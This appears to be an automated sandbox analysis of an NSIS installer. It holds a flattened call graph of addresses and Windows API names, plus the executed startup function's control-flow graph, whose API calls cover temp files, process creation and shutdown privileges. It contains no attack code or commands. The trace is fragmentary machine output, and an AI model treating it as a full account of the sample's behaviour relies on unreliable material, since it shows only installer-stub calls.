MessageBoxIndirectW 4301->4306 4312 406557 lstrcpynW 4302->4312 4304 401c08 GlobalFree 4304->4311 4306->4311 4307 401bd3 4313 406557 lstrcpynW 4307->4313 4309 401be2 4315 406557 lstrcpynW 4309->4315 4312->4307 4313->4309 4314->4304 4315->4311 4316 402621 4317 402dab 21 API calls 4316->4317 4318 402628 4317->4318 4321 406047 GetFileAttributesW CreateFileW 4318->4321 4320 402634 4321->4320 4322 4025a3 4332 402deb 4322->4332 4325 402d89 21 API calls 4326 4025b6 4325->4326 4327 4025d2 RegEnumKeyW 4326->4327 4328 4025de RegEnumValueW 4326->4328 4329 402933 4326->4329 4330 4025f3 RegCloseKey 4327->4330 4328->4330 4330->4329 4333 402dab 21 API calls 4332->4333 4334 402e02 4333->4334 4335 4063c4 RegOpenKeyExW 4334->4335 4336 4025ad 4335->4336 4336->4325 4337 4015a8 4338 402dab 21 API calls 4337->4338 4339 4015af SetFileAttributesW 4338->4339 4340 4015c1 4339->4340 3478 401fa9 3479 402dab 21 API calls 3478->3479 3480 401faf 3479->3480 3481 4055dc 28 API calls 3480->3481 3482 401fb9 3481->3482 3483 405b3a 2 API calls 3482->3483 3484 401fbf 3483->3484 3485 401fe2 CloseHandle 3484->3485 3489 402933 3484->3489 3493 4069f6 WaitForSingleObject 3484->3493 3485->3489 3488 401fd4 3490 401fe4 3488->3490 3491 401fd9 3488->3491 3490->3485 3498 40649e wsprintfW 3491->3498 3494 406a10 3493->3494 3495 406a22 GetExitCodeProcess 3494->3495 3496 406987 2 API calls 3494->3496 3495->3488 3497 406a17 WaitForSingleObject 3496->3497 3497->3494 3498->3485 4341 40202f 4342 402dab 21 API calls 4341->4342 4343 402036 4342->4343 4344 40694b 5 API calls 4343->4344 4345 402045 4344->4345 4346 402061 GlobalAlloc 4345->4346 4347 4020d1 4345->4347 4346->4347 4348 402075 4346->4348 4349 40694b 5 API calls 4348->4349 4350 40207c 4349->4350 4351 40694b 5 API calls 4350->4351 4352 402086 4351->4352 4352->4347 4356 40649e wsprintfW 4352->4356 4354 4020bf 4357 40649e wsprintfW 4354->4357 4356->4354 4357->4347 4358 40252f 4359 402deb 21 API calls 4358->4359 4360 402539 4359->4360 4361 402dab 21 API calls 4360->4361 4362 402542 4361->4362 4363 40254d RegQueryValueExW 4362->4363 4365 402933 4362->4365 4364 40256d 4363->4364 4368 402573 RegCloseKey 4363->4368 4364->4368 4369 40649e wsprintfW 4364->4369 4368->4365 4369->4368 4370 4021af 4371 402dab 21 API calls 4370->4371 4372 4021b6 4371->4372 4373 402dab 21 API calls 4372->4373 4374 4021c0 4373->4374 4375 402dab 21 API calls 4374->4375 4376 4021ca 4375->4376 4377 402dab 21 API calls 4376->4377 4378 4021d4 4377->4378 4379 402dab 21 API calls 4378->4379 4380 4021de 4379->4380 4381 40221d CoCreateInstance 4380->4381 4382 402dab 21 API calls 4380->4382 4385 40223c 4381->4385 4382->4381 4383 401423 28 API calls 4384 4022fb 4383->4384 4385->4383 4385->4384 2924 403532 SetErrorMode GetVersionExW 2925 403586 GetVersionExW 2924->2925 2926 4035be 2924->2926 2925->2926 2927 403615 2926->2927 2928 40694b 5 API calls 2926->2928 3012 4068db GetSystemDirectoryW 2927->3012 2928->2927 2930 40362b lstrlenA 2930->2927 2931 40363b 2930->2931 3015 40694b GetModuleHandleA 2931->3015 2934 40694b 5 API calls 2935 403649 2934->2935 2936 40694b 5 API calls 2935->2936 2940 403655 #17 OleInitialize SHGetFileInfoW 2936->2940 2939 4036a4 GetCommandLineW 3022 406557 lstrcpynW 2939->3022 3021 406557 lstrcpynW 2940->3021 2942 4036b6 3023 405e53 2942->3023 2945 4037f0 2946 403804 GetTempPathW 2945->2946 3027 403501 2946->3027 2948 40381c 2949 403820 GetWindowsDirectoryW lstrcatW 2948->2949 2950 403876 DeleteFileW 2948->2950 2953 403501 12 API calls 2949->2953 3037 403082 GetTickCount GetModuleFileNameW 2950->3037 2951 405e53 CharNextW 2952 4036ee 2951->2952 2952->2945 2952->2951 2958 4037f2 2952->2958 2955 40383c 2953->2955 2955->2950 2957 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2955->2957 2956 40388a 2959 403a7d ExitProcess OleUninitialize 2956->2959 2963 403931 2956->2963 2967 405e53 CharNextW 2956->2967 2960 403501 12 API calls 2957->2960 3122 406557 lstrcpynW 2958->3122 2961 403ab3 2959->2961 2962 403a8f 2959->2962 2965 40386e 2960->2965 2968 403b37 ExitProcess 2961->2968 2969 403abb GetCurrentProcess OpenProcessToken 2961->2969 3214 405bb7 2962->3214 3065 403c29 2963->3065 2965->2950 2965->2959 2980 4038a9 2967->2980 2971 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 2969->2971 2972 403b07 2969->2972 2971->2972 2976 40694b 5 API calls 2972->2976 2977 403b0e 2976->2977 2982 403b23 ExitWindowsEx 2977->2982 2985 403b30 2977->2985 2978 403907 3123 405f2e 2978->3123 2979 40394a 3140 405b22 2979->3140 2980->2978 2980->2979 2982->2968 2982->2985 3218 40140b 2985->3218 2989 403969 2991 403972 2989->2991 3009 403981 2989->3009 3144 406557 lstrcpynW 2991->3144 2992 403926 3139 406557 lstrcpynW 2992->3139 2995 4039a7 wsprintfW 3145 406594 2995->3145 2999 4039e3 GetFileAttributesW 3001 4039ef DeleteFileW 2999->3001 2999->3009 3000 403a1d SetCurrentDirectoryW 3204 406317 MoveFileExW 3000->3204 3001->3009 3003 403a1b 3003->2959 3006 406317 40 API calls 3006->3009 3007 406594 21 API calls 3007->3009 3009->2995 3009->2999 3009->3000 3009->3003 3009->3006 3009->3007 3010 403aa5 CloseHandle 3009->3010 3162 405aab CreateDirectoryW 3009->3162 3165 405b05 CreateDirectoryW 3009->3165 3168 405c63 3009->3168 3208 405b3a CreateProcessW 3009->3208 3211 4068b4 FindFirstFileW 3009->3211 3010->3003 3013 4068fd wsprintfW LoadLibraryExW 3012->3013 3013->2930 3016 406971 GetProcAddress 3015->3016 3017 406967 3015->3017 3018 403642 3016->3018 3019 4068db 3 API calls 3017->3019 3018->2934 3020 40696d 3019->3020 3020->3016 3020->3018 3021->2939 3022->2942 3024 405e59 3023->3024 3025 4036dc CharNextW 3024->3025 3026 405e60 CharNextW 3024->3026 3025->2952 3026->3024 3221 406805 3027->3221 3029 403517 3029->2948 3030 40350d 3030->3029 3230 405e26 lstrlenW CharPrevW 3030->3230 3033 405b05 2 API calls 3034 403525 3033->3034 3233 406076 3034->3233 3237 406047 GetFileAttributesW CreateFileW 3037->3237 3039 4030c2 3057 4030d2 3039->3057 3238 406557 lstrcpynW 3039->3238 3041 4030e8 3239 405e72 lstrlenW 3041->3239 3045 4030f9 GetFileSize 3046 4031f3 3045->3046 3059 403110 3045->3059 3244 40301e 3046->3244 3048 4031fc 3050 40322c GlobalAlloc 3048->3050 3048->3057 3279 4034ea SetFilePointer 3048->3279 3255 4034ea SetFilePointer 3050->3255 3052 40325f 3054 40301e 6 API calls 3052->3054 3054->3057 3055 403215 3058 4034d4 ReadFile 3055->3058 3056 403247 3256 4032b9 3056->3256 3057->2956 3061 403220 3058->3061 3059->3046 3059->3052 3059->3057 3062 40301e 6 API calls 3059->3062 3276 4034d4 3059->3276 3061->3050 3061->3057 3062->3059 3063 403253 3063->3057 3063->3063 3064 403290 SetFilePointer 3063->3064 3064->3057 3066 40694b 5 API calls 3065->3066 3067 403c3d 3066->3067 3068 403c43 3067->3068 3069 403c55 3067->3069 3308 40649e wsprintfW 3068->3308 3309 406425 3069->3309 3072 403ca4 lstrcatW 3074 403c53 3072->3074 3300 403eff 3074->3300 3075 406425 3 API calls 3075->3072 3078 405f2e 18 API calls 3079 403cd6 3078->3079 3080 403d6a 3079->3080 3083 406425 3 API calls 3079->3083 3081 405f2e 18 API calls 3080->3081 3082 403d70 3081->3082 3084 403d80 LoadImageW 3082->3084 3086 406594 21 API calls 3082->3086 3085 403d08 3083->3085 3087 403e26 3084->3087 3088 403da7 RegisterClassW 3084->3088 3085->3080 3089 403d29 lstrlenW 3085->3089 3092 405e53 CharNextW 3085->3092 3086->3084 3091 40140b 2 API calls 3087->3091 3090 403ddd SystemParametersInfoW CreateWindowExW 3088->3090 3098 403941 3088->3098 3093 403d37 lstrcmpiW 3089->3093 3094 403d5d 3089->3094 3090->3087 3095 403e2c 3091->3095 3096 403d26 3092->3096 3093->3094 3097 403d47 GetFileAttributesW 3093->3097 3099 405e26 3 API calls 3094->3099 3095->3098 3101 403eff 22 API calls 3095->3101 3096->3089 3100 403d53 3097->3100 3098->2959 3102 403d63 3099->3102 3100->3094 3103 405e72 2 API calls 3100->3103 3104 403e3d 3101->3104 3314 406557 lstrcpynW 3102->3314 3103->3094 3106 403e49 ShowWindow 3104->3106 3107 403ecc 3104->3107 3109 4068db 3 API calls 3106->3109 3315 4056af OleInitialize 3107->3315 3111 403e61 3109->3111 3110 403ed2 3113 403ed6 3110->3113 3114 403eee 3110->3114 3112 403e6f GetClassInfoW 3111->3112 3115 4068db 3 API calls 3111->3115 3117 403e83 GetClassInfoW RegisterClassW 3112->3117 3118 403e99 DialogBoxParamW 3112->3118 3113->3098 3120 40140b 2 API calls 3113->3120 3116 40140b 2 API calls 3114->3116 3115->3112 3116->3098 3117->3118 3119 40140b 2 API calls 3118->3119 3121 403ec1 3119->3121 3120->3098 3121->3098 3122->2946 3337 406557 lstrcpynW 3123->3337 3125 405f3f 3338 405ed1 CharNextW CharNextW 3125->3338 3128 403913 3128->2959 3138 406557 lstrcpynW 3128->3138 3129 406805 5 API calls 3130 405f55 3129->3130 3130->3128 3135 405f6c 3130->3135 3131 405f86 lstrlenW 3132 405f91 3131->3132 3131->3135 3134 405e26 3 API calls 3132->3134 3133 4068b4 2 API calls 3133->3135 3136 405f96 GetFileAttributesW 3134->3136 3135->3128 3135->3131 3135->3133 3137 405e72 2 API calls 3135->3137 3136->3128 3137->3131 3138->2992 3139->2963 3141 40694b 5 API calls 3140->3141 3142 40394f lstrlenW 3141->3142 3143 406557 lstrcpynW 3142->3143 3143->2989 3144->3009 3160 40659f 3145->3160 3146 4067e6 3147 4067ff 3146->3147 3346 406557 lstrcpynW 3146->3346 3147->3009 3149 4067b7 lstrlenW 3149->3160 3151 406425 3 API calls 3151->3160 3153 4066b0 GetSystemDirectoryW 3153->3160 3154 406594 15 API calls 3154->3149 3155 4066c6 GetWindowsDirectoryW 3155->3160 3156 406805 5 API calls 3156->3160 3157 406594 15 API calls 3157->3160 3158 406758 lstrcatW 3158->3160 3159 40694b 5 API calls 3159->3160 3160->3146 3160->3149 3160->3151 3160->3153 3160->3154 3160->3155 3160->3156 3160->3157 3160->3158 3160->3159 3161 406728 SHGetPathFromIDListW CoTaskMemFree 3160->3161 3344 40649e wsprintfW 3160->3344 3345 406557 lstrcpynW 3160->3345 3161->3160 3163 405af7 3162->3163 3164 405afb GetLastError 3162->3164 3163->3009 3164->3163 3166 405b15 3165->3166 3167 405b19 GetLastError 3165->3167 3166->3009 3167->3166 3169 405f2e 18 API calls 3168->3169 3170 405c83 3169->3170 3171 405ca2 3170->3171 3172 405c8b DeleteFileW 3170->3172 3173 405dc2 3171->3173 3347 406557 lstrcpynW 3171->3347 3201 405dd9 3172->3201 3180 4068b4 2 API calls 3173->3180 3173->3201 3175 405cc8 3176 405cdb 3175->3176 3177 405cce lstrcatW 3175->3177 3179 405e72 2 API calls 3176->3179 3178 405ce1 3177->3178 3181 405cf1 lstrcatW 3178->3181 3183 405cfc lstrlenW FindFirstFileW 3178->3183 3179->3178 3182 405de7 3180->3182 3181->3183 3184 405e26 3 API calls 3182->3184 3182->3201 3183->3173 3185 405d1e 3183->3185 3186 405df1 3184->3186 3187 405da5 FindNextFileW 3185->3187 3197 405c63 64 API calls 3185->3197 3199 4055dc 28 API calls 3185->3199 3202 4055dc 28 API calls 3185->3202 3203 406317 40 API calls 3185->3203 3348 406557 lstrcpynW 3185->3348 3349 405c1b 3185->3349 3188 405c1b 5 API calls 3186->3188 3187->3185 3191 405dbb FindClose 3187->3191 3190 405dfd 3188->3190 3192 405e17 3190->3192 3193 405e01 3190->3193 3191->3173 3195 4055dc 28 API calls 3192->3195 3196 4055dc 28 API calls 3193->3196 3193->3201 3195->3201 3198 405e0e 3196->3198 3197->3185 3200 406317 40 API calls 3198->3200 3199->3187 3200->3201 3201->3009 3202->3185 3203->3185 3205 403a2c CopyFileW 3204->3205 3206 40632b 3204->3206 3205->3003 3205->3009 3360 40619d 3206->3360 3209 405b79 3208->3209 3210 405b6d CloseHandle 3208->3210 3209->3009 3210->3209 3212 4068ca FindClose 3211->3212 3213 4068d5 3211->3213 3212->3213 3213->3009 3215 405bcc 3214->3215 3216 403a9d ExitProcess 3215->3216 3217 405be0 MessageBoxIndirectW 3215->3217 3217->3216 3219 401389 2 API calls 3218->3219 3220 401420 3219->3220 3220->2968 3227 406812 3221->3227 3222 40688d CharPrevW 3223 406888 3222->3223 3223->3222 3225 4068ae 3223->3225 3224 40687b CharNextW 3224->3223 3224->3227 3225->3030 3226 405e53 CharNextW 3226->3227 3227->3223 3227->3224 3227->3226 3228 406867 CharNextW 3227->3228 3229 406876 CharNextW 3227->3229 3228->3227 3229->3224 3231 405e42 lstrcatW 3230->3231 3232 40351f 3230->3232 3231->3232 3232->3033 3234 406083 GetTickCount GetTempFileNameW 3233->3234 3235 4060b9 3234->3235 3236 403530 3234->3236 3235->3234 3235->3236 3236->2948 3237->3039 3238->3041 3240 405e80 3239->3240 3241 4030ee 3240->3241 3242 405e86 CharPrevW 3240->3242 3243 406557 lstrcpynW 3241->3243 3242->3240 3242->3241 3243->3045 3245 403027 3244->3245 3246 40303f 3244->3246 3247 403030 DestroyWindow 3245->3247 3248 403037 3245->3248 3249 403047 3246->3249 3250 40304f GetTickCount 3246->3250 3247->3248 3248->3048 3280 406987 3249->3280 3251 403080 3250->3251 3252 40305d CreateDialogParamW ShowWindow 3250->3252 3251->3048 3252->3251 3255->3056 3258 4032d2 3256->3258 3257 403300 3259 4034d4 ReadFile 3257->3259 3258->3257 3286 4034ea SetFilePointer 3258->3286 3261 40330b 3259->3261 3262 40346d 3261->3262 3263 40331d GetTickCount 3261->3263 3265 403457 3261->3265 3264 4034af 3262->3264 3269 403471 3262->3269 3263->3265 3272 40336c 3263->3272 3266 4034d4 ReadFile 3264->3266 3265->3063 3266->3265 3267 4034d4 ReadFile 3267->3272 3268 4034d4 ReadFile 3268->3269 3269->3265 3269->3268 3270 4060f9 WriteFile 3269->3270 3270->3269 3271 4033c2 GetTickCount 3271->3272 3272->3265 3272->3267 3272->3271 3273 4033e7 MulDiv wsprintfW 3272->3273 3284 4060f9 WriteFile 3272->3284 3287 4055dc 3273->3287 3298 4060ca ReadFile 3276->3298 3279->3055 3281 4069a4 PeekMessageW 3280->3281 3282 40304d 3281->3282 3283 40699a DispatchMessageW 3281->3283 3282->3048 3283->3281 3285 406117 3284->3285 3285->3272 3286->3257 3288 4055f7 3287->3288 3289 405699 3287->3289 3290 405613 lstrlenW 3288->3290 3293 406594 21 API calls 3288->3293 3289->3272 3291 405621 lstrlenW 3290->3291 3292 40563c 3290->3292 3291->3289 3294 405633 lstrcatW 3291->3294 3295 405642 SetWindowTextW 3292->3295 3296 40564f 3292->3296 3293->3290 3294->3292 3295->3296 3296->3289 3297 405655 SendMessageW SendMessageW SendMessageW 3296->3297 3297->3289 3299 4034e7 3298->3299 3299->3059 3301 403f13 3300->3301 3322 40649e wsprintfW 3301->3322 3303 403f84 3323 403fb8 3303->3323 3305 403f89 3306 403cb4 3305->3306 3307 406594 21 API calls 3305->3307 3306->3078 3307->3305 3308->3074 3326 4063c4 3309->3326 3312 403c85 3312->3072 3312->3075 3313 406459 RegQueryValueExW RegCloseKey 3313->3312 3314->3080 3330 404522 3315->3330 3317 4056f9 3318 404522 SendMessageW 3317->3318 3320 40570b OleUninitialize 3318->3320 3319 4056d2 3319->3317 3333 401389 3319->3333 3320->3110 3322->3303 3324 406594 21 API calls 3323->3324 3325 403fc6 SetWindowTextW 3324->3325 3325->3305 3327 4063d3 3326->3327 3328 4063d7 3327->3328 3329 4063dc RegOpenKeyExW 3327->3329 3328->3312 3328->3313 3329->3328 3331 40453a 3330->3331 3332 40452b SendMessageW 3330->3332 3331->3319 3332->3331 3335 401390 3333->3335 3334 4013fe 3334->3319 3335->3334 3336 4013cb MulDiv SendMessageW 3335->3336 3336->3335 3337->3125 3339 405eee 3338->3339 3342 405f00 3338->3342 3341 405efb CharNextW 3339->3341 3339->3342 3340 405f24 3340->3128 3340->3129 3341->3340 3342->3340 3343 405e53 CharNextW 3342->3343 3343->3342 3344->3160 3345->3160 3346->3147 3347->3175 3348->3185 3357 406022 GetFileAttributesW 3349->3357 3352 405c48 3352->3185 3353 405c36 RemoveDirectoryW 3355 405c44 3353->3355 3354 405c3e DeleteFileW 3354->3355 3355->3352 3356 405c54 SetFileAttributesW 3355->3356 3356->3352 3358 405c27 3357->3358 3359 406034 SetFileAttributesW 3357->3359 3358->3352 3358->3353 3358->3354 3359->3358 3361 4061f3 GetShortPathNameW 3360->3361 3362 4061cd 3360->3362 3364 406312 3361->3364 3365 406208 3361->3365 3387 406047 GetFileAttributesW CreateFileW 3362->3387 3364->3205 3365->3364 3367 406210 wsprintfA 3365->3367 3366 4061d7 CloseHandle GetShortPathNameW 3366->3364 3368 4061eb 3366->3368 3369 406594 21 API calls 3367->3369 3368->3361 3368->3364 3370 406238 3369->3370 3388 406047 GetFileAttributesW CreateFileW 3370->3388 3372 406245 3372->3364 3373 406254 GetFileSize GlobalAlloc 3372->3373 3374 406276 3373->3374 3375 40630b CloseHandle 3373->3375 3376 4060ca ReadFile 3374->3376 3375->3364 3377 40627e 3376->3377 3377->3375 3389 405fac lstrlenA 3377->3389 3380 406295 lstrcpyA 3383 4062b7 3380->3383 3381 4062a9 3382 405fac 4 API calls 3381->3382 3382->3383 3384 4062ee SetFilePointer 3383->3384 3385 4060f9 WriteFile 3384->3385 3386 406304 GlobalFree 3385->3386 3386->3375 3387->3366 3388->3372 3390 405fed lstrlenA 3389->3390 3391 405ff5 3390->3391 3392 405fc6 lstrcmpiA 3390->3392 3391->3380 3391->3381 3392->3391 3393 405fe4 CharNextA 3392->3393 3393->3390 4386 401a35 4387 402dab 21 API calls 4386->4387 4388 401a3e ExpandEnvironmentStringsW 4387->4388 4389 401a52 4388->4389 4391 401a65 4388->4391 4390 401a57 lstrcmpW 4389->4390 4389->4391 4390->4391 4397 4023b7 4398 4023c5 4397->4398 4399 4023bf 4397->4399 4401 4023d3 4398->4401 4402 402dab 21 API calls 4398->4402 4400 402dab 21 API calls 4399->4400 4400->4398 4403 4023e1 4401->4403 4404 402dab 21 API calls 4401->4404 4402->4401 4405 402dab 21 API calls 4403->4405 4404->4403 4406 4023ea WritePrivateProfileStringW 4405->4406 4407 4014b8 4408 4014be 4407->4408 4409 401389 2 API calls 4408->4409 4410 4014c6 4409->4410 4411 402439 4412 402441 4411->4412 4413 40246c 4411->4413 4415 402deb 21 API calls 4412->4415 4414 402dab 21 API calls 4413->4414 4416 402473 4414->4416 4417 402448 4415->4417 4422 402e69 4416->4422 4419 402dab 21 API calls 4417->4419 4421 402480 4417->4421 4420 402459 RegDeleteValueW RegCloseKey 4419->4420 4420->4421 4423 402e76 4422->4423 4424 402e7d 4422->4424 4423->4421 4424->4423 4426 402eae 4424->4426 4427 4063c4 RegOpenKeyExW 4426->4427 4428 402edc 4427->4428 4429 402f86 4428->4429 4430 402eec RegEnumValueW 4428->4430 4434 402f0f 4428->4434 4429->4423 4431 402f76 RegCloseKey 4430->4431 4430->4434 4431->4429 4432 402f4b RegEnumKeyW 4433 402f54 RegCloseKey 4432->4433 4432->4434 4435 40694b 5 API calls 4433->4435 4434->4431 4434->4432 4434->4433 4436 402eae 6 API calls 4434->4436 4437 402f64 4435->4437 4436->4434 4437->4429 4438 402f68 RegDeleteKeyW 4437->4438 4438->4429 4439 40173a 4440 402dab 21 API calls 4439->4440 4441 401741 SearchPathW 4440->4441 4442 40175c 4441->4442 4443 401d3d 4444 402d89 21 API calls 4443->4444 4445 401d44 4444->4445 4446 402d89 21 API calls 4445->4446 4447 401d50 GetDlgItem 4446->4447 4448 40263d 4447->4448

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00403532 Relevance: 77.5, APIs: 33, Strings: 11, Instructions: 464stringfilecomCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 7 403625-403639 call 4068db lstrlenA 5->7 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 7->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 26 403661 21->26 26->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 39 403706-40370b 36->39 40 40370c-403710 36->40 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 39->40 42 4037d1-4037e0 call 405e53 40->42 43 403716-40371c 40->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d ExitProcess OleUninitialize 45->67 49 403771-403776 47->49 50 40378c-4037c6 47->50 54 403727-40372a 48->54 55 40372c 48->55 49->50 56 403778-403780 49->56 58 4037c8-4037cc 50->58 59 4037ce-4037d0 50->59 54->47 54->55 55->47 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->50 62->63 63->50 64->45 64->67 65->37 71 4038a2-4038ad call 405e53 66->71 72 403935-40393c call 403c29 66->72 69 403ab3-403ab9 67->69 70 403a8f-403a9f call 405bb7 ExitProcess 67->70 77 403b37-403b3f 69->77 78 403abb-403ad1 GetCurrentProcess OpenProcessToken 69->78 87 4038fb-403905 71->87 88 4038af-4038e4 71->88 82 403941-403945 72->82 83 403b41 77->83 84 403b45-403b49 ExitProcess 77->84 80 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 78->80 81 403b07-403b15 call 40694b 78->81 80->81 97 403b23-403b2e ExitWindowsEx 81->97 98 403b17-403b21 81->98 82->67 83->84 92 403907-403915 call 405f2e 87->92 93 40394a-403970 call 405b22 lstrlenW call 406557 87->93 90 4038e6-4038ea 88->90 94 4038f3-4038f7 90->94 95 4038ec-4038f1 90->95 92->67 107 40391b-403931 call 406557 * 2 92->107 110 403981-403999 93->110 111 403972-40397c call 406557 93->111 94->90 100 4038f9 94->100 95->94 95->100 97->77 102 403b30-403b32 call 40140b 97->102 98->97 98->102 100->87 102->77 107->72 114 40399e-4039a2 110->114 111->110 116 4039a7-4039d1 wsprintfW call 406594 114->116 120 4039d3-4039d8 call 405aab 116->120 121 4039da call 405b05 116->121 124 4039df-4039e1 120->124 121->124 126 4039e3-4039ed GetFileAttributesW 124->126 127 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 124->127 128 403a0e-403a19 126->128 129 4039ef-4039f8 DeleteFileW 126->129 135 403a7b 127->135 136 403a3e-403a5f call 406317 call 406594 call 405b3a 127->136 128->114 132 403a1b 128->132 129->128 131 4039fa-403a0c call 405c63 129->131 131->116 131->128 132->67 135->67 144 403a61-403a6b 136->144 145 403aa5-403ab1 CloseHandle 136->145 144->135 146 403a6d-403a75 call 4068b4 144->146 145->135 146->116 146->135
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 00403555
                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                                                                    • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                                                                    • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                    • wsprintfW.USER32 ref: 004039B1
                                                                                                                                    • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                                                                    • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                                                                      • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                    • CopyFileW.KERNEL32(00442800,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                      • Part of subcall function 004068B4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                      • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
                                                                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B49
